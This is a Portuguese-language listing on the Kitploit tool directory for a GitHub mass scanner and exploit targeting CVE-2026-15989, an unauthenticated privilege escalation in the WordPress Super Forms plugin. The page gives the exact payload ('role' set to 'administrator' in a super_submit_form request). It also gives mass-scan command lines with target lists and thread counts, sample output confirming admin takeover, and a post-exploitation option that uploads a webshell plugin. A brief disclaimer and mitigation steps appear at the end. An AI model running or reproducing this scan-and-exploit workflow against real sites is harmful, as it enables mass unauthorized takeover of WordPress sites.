Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-15989 — Scanner em massa e exploit para CVE-2026-15989, a escalada de privilégios não autenticada no Super Forms <= 6.3.316 que cria contas de administrador através do parâmetro role. | Kitploit
Ferramentas/GitHubGitHub/fl0ydsec/cve-2026-15989
Escalada de PrivilégiosScanners de VulnerabilidadesGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoSegurança WebTestes de Penetração
GitHubfl0ydsec/cve-2026-15989

CVE-2026-15989

há 6h 10mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Scanner em massa e exploit para CVE-2026-15989, a escalada de privilégios não autenticada no Super Forms <= 6.3.316 que cria contas de administrador através do parâmetro role.

Ver Repositório

CVE-2026-15989 — Super Forms ≤ 6.3.316 — PoC de Escalação de Privilégios Não Autenticada

Super Forms – Drag & Drop Form Builder (WordPress) ≤ 6.3.316 — escalação de privilégios não autenticada através do parâmetro role do add-on premium Register & Login.

CVE-2026-15989 CVSS WordPress Auth

Author Python Telegram


📋 Visão Geral da Vulnerabilidade

AtributoDetalhes
CVE IDCVE-2026-15989
Cadeiaformulário de registro → 'role' em $other_userdata → wp_insert_user(role=administrator) → ADMIN
Severidade🔴 CRÍTICA (CVSS 9.8)
AlvoSuper Forms – Drag & Drop Form Builder + add-on premium Register & Login
Afetado≤ 6.3.316 (core) — builds vulneráveis do add-on (v1.x)
Corrigido6.3.317
Autenticação NecessáriaNenhuma

🔍 Descrição Técnica

O add-on define o papel do novo usuário a partir das configurações do formulário ($userdata['role'] = $settings['register_user_role']), depois percorre $other_userdata — que contém 'role' — e sobrescreve qualquer chave com o valor fornecido pelo cliente ($data['role']['value']) antes de chamar wp_insert_user().

POST /wp-admin/admin-ajax.php  (unauthenticated)
        │
        ▼
action=super_submit_form + data={"role":{"value":"administrator"}, ...}
        │
        ▼
$other_userdata loop ─► $userdata['role'] = $data['role']['value']
        │
        ▼
wp_insert_user() ─► administrator account created
        │
        ▼
register_login_activation='login'/'auto' ─► wp_set_auth_cookie ─► admin session

Correção (6.3.317): 'role' removido da whitelist + get_safe_public_registration_role() (fail-closed).

Pesquisa original — protocolo de envio duplo: o core mudou de protocolo na v5.0.0.

CoreAçãoFormato dos dadosNonce
4.xsuper_send_emailcampos aninhados (data[role][value]=...)nenhum (verificações comentadas)
5.x/6.xsuper_submit_formstring JSONsf_nonce via super_create_nonce

A ferramenta escolhe o protocolo automaticamente a partir da versão detectada.


🚀 Uso

# mass scan + exploit
python CVE-2026-15989.py --list targets.txt --threads 10 --force --only-hits --results hits.txt --user Floydroot --password 'Floyd@2026!root'
python CVE-2026-15989.py --list targets.txt --threads 15 --timeout 6 --force --quiet --results hits.txt --user U --password P --no-dedup

# single target
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --email EMAIL --insecure
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --login --rce --insecure

# re-check an existing account without re-registering
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --only-login --insecure
OpçãoDescrição
--list FILEUm alvo por linha; URL|form_id ou URL|form_id=ID,email=X por linha
-u/--target, --portAlvo único
--threads, --timeout, --no-dedupAjuste do modo massivo
--forceDispara o payload mesmo sem um formulário de registro detectado
--only-hits / --quietÁrvores apenas para hits confirmados / saída mínima
--resetconclusão do modo verify via lost-password (o operador cola o link de reset)
--only-loginPula o registro; faz login e verifica o papel via users/me
--login / --rcePós-exploração em alvo real: prova de login / upload de plugin webshell
-k/--insecureIgnora TLS

📊 Saída

│  ├─ plugin   : 6.3.316 — VULNERABLE <= 6.3.316
│  ├─ addon    : v1.8.7
│  ├─ form     : 4169 (/register/)
│  ├─ proto    : 5.x/6.x (super_submit_form, JSON, sf_nonce)
│  ├─ payload  : HTTP 200 ✓ processed
│  └─ session  : cookie ✓ · admin confirmed — Floydroot/Floyd@2026!root
└─── ✔ ADMIN CONFIRMED
  • hits.txt — apenas alvos confirmados (ts|url|status|detail, com usuário/senha)
  • barra com ETA + contadores por status; cada fase imprime o motivo real em caso de falha (WAF, crash, formulário apenas de login, protocolo errado...)

⚙️ Funcionalidades

  • Protocolo duplo (4.x dados aninhados / 5+ JSON+nonce) — selecionado automaticamente pela versão
  • Detecção de versão: tag Stable do readme.txt + common.js?ver=; sondagem do add-on + sua própria versão
  • Descoberta de formulário de registro: caminhos comuns + sitemap.xml/wp-sitemap.xml/sitemap_index + links da home
  • Preenchimento automático de campos obrigatórios (incluindo hidden/condicionais)
  • "já existe" → prova de login direta da conta existente
  • Controle de crash: reenvia o formulário sem o papel injetado para distinguir problemas do lado do servidor de crashes disparados pela injeção
  • Prova autoritativa de admin via /wp-json/wp/v2/users/me?context=edit (fallback: users.php / dashboard)

📁 Estrutura de Arquivos

├── CVE-2026-15989.py   # mass scanner + exploit
├── README.md
├── LICENSE
└── .gitignore

⚠️ Aviso Legal

╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║  Only use on systems you own or have explicit permission.       ║
║  The author is NOT responsible for any misuse or damage.        ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ Mitigação

  1. Atualize o Super Forms para 6.3.317 (ou posterior) e rotacione quaisquer credenciais vazadas
  2. Mantenha o add-on Register & Login atualizado (ele tem seu próprio ciclo de versão)
  3. Remova/desative formulários de registro publicados quando não forem necessários
  4. Audite os usuários em wp-admin/ em busca de contas de administrador inesperadas

👤 Autor

fl0ydsec (Floydroot)

GitHub Telegram

Security Research

Baixar ferramenta